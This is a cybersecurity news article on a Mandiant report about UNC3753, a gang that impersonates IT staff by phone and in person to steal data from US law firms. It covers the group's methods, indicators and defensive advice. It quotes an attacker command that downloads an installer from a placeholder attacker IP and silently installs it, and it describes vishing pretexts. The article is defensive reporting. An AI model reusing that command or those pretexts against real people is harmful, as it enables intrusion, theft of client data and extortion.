Silent Ransom Gang Sends Fake IT Staff Into Law Firm Offices

A cybercriminal gang has compromised dozens of US law firms by calling employees, posing as IT support, and in some cases physically walking into offices to steal data. Google's Mandiant published a detailed report on UNC3753—also known as Silent Ransom Group, Luna Moth, and Chatty Spider—documenting attacks from January through May 2026 that moved from initial contact to data theft in under an hour.

The FBI issued a flash alert warning of the group's escalation to physical intrusions, a capability that sets them apart from typical ransomware operations.

Attack Methodology

UNC3753's approach bypasses technical security controls by targeting human psychology. The campaign begins with innocuous invoice-themed emails sent from consumer email accounts—no malicious links, no attachments, just generic messages like "hello, here is the invcoie we talked about yesterday."

These emails establish pretext for follow-up phone calls. Attackers pose as internal IT helpdesk or security team members, claiming to address security issues or assist with data migration projects. They contact personnel across all seniority levels, identifying targets through public organizational websites.

The goal: convince victims to join screen-sharing sessions and download remote monitoring tools. Mandiant observed attackers holding up to five separate calls with the same target over three days until they succeeded.

Remote Access Tools

Once they have victims on screen-sharing platforms like Microsoft Teams, Zoom, or Quick Assist, attackers guide them to install remote monitoring and management (RMM) utilities:

• AnyDesk
• Bomgar
• Zoho Assist
• SuperOps RMM agent

Attackers use Privnote—a self-destructing message service—to send installation commands, leaving no permanent forensic trail. A typical command observed: curl -sL "http://[attacker-ip]/installer" -o "SuperOps.msi" && msiexec /i "SuperOps.msi" /quiet

From Access to Exfiltration

Once inside, UNC3753 moves fast. They enumerate systems, map OneDrive folders, and crawl network drives. In law firms specifically, they target document management systems like iManage, running keyword searches for:

• Tax forms (W-2, W-9, 1099)
• Audit files
• Corporate client agreements
• Social Security numbers

Data staging happens in Downloads folders or Roaming profile paths. Exfiltration uses browser uploads to attacker-controlled cloud storage accounts—with folders renamed to mimic victim organization branding—or WinSCP and Rclone when browser uploads are restricted. In one incident, attackers exfiltrated 1.7 GB via Google Drive and 14.4 GB via WinSCP.

Physical Intrusion Capability

When remote social engineering fails, UNC3753 escalates to physical access. Attackers show up at offices claiming to image devices or create local backups, then exfiltrate data directly to external USB drives.

This capability is rare among cybercriminal groups and represents a significant operational investment. It also suggests the potential value of law firm data justifies the additional risk of in-person operations.

Extortion Timeline

The pace is aggressive. Mandiant observed data searches, staging, and theft initiated in under one hour from initial access. Unbranded extortion emails often arrive within 30 minutes of attackers exiting the victim environment.

Demands give organizations a three-day deadline and threaten:

• Direct calls and emails to employees and clients
• Publication on the LEAKEDDATA leak site
• Regulatory fines and litigation warnings
• Reputational damage scenarios

Why Law Firms

Legal services firms store concentrated repositories of sensitive client information: merger and acquisition plans, trade secrets, regulatory reports, and personal data. The reputational and regulatory exposure creates strong pressure to resolve extortion quietly—exactly what these attackers count on.

This targeting pattern aligns with broader trends. We've covered nation-state actors targeting professional services for similar reasons, though UNC3753's motivations appear purely financial.

Indicators of Compromise

Infrastructure IPs:

• 192.236.147.131
• 192.236.147.138
• 193.141.60.212
• 192.236.154.158
• 192.236.146.173
• 174.169.162.62
• 64.94.84.97

Phishing domain patterns:

• [organization]-itdesk[.]com
• [organization]-it[.]com
• [organization]-helpdesk[.]com

Defensive Recommendations

1. Train staff specifically on UNC3753 tactics—generic phishing awareness won't cover vishing pretexts
2. Require photo ID and escort for all external technical personnel
3. Verify technician visits against pre-scheduled work orders with the actual vendor
4. Block unauthorized RMM tools via application control policies
5. Restrict removable media on corporate and BYOD endpoints
6. Monitor for bulk file searches and rapid downloads in document management systems
7. Implement conditional access restricting VPN and VDI to corporate-owned devices

The evolution from email-only campaigns to voice phishing to physical intrusions shows UNC3753 adapting to bypass security controls. Organizations—especially law firms and professional services—should assume their staff will be targeted and prepare accordingly.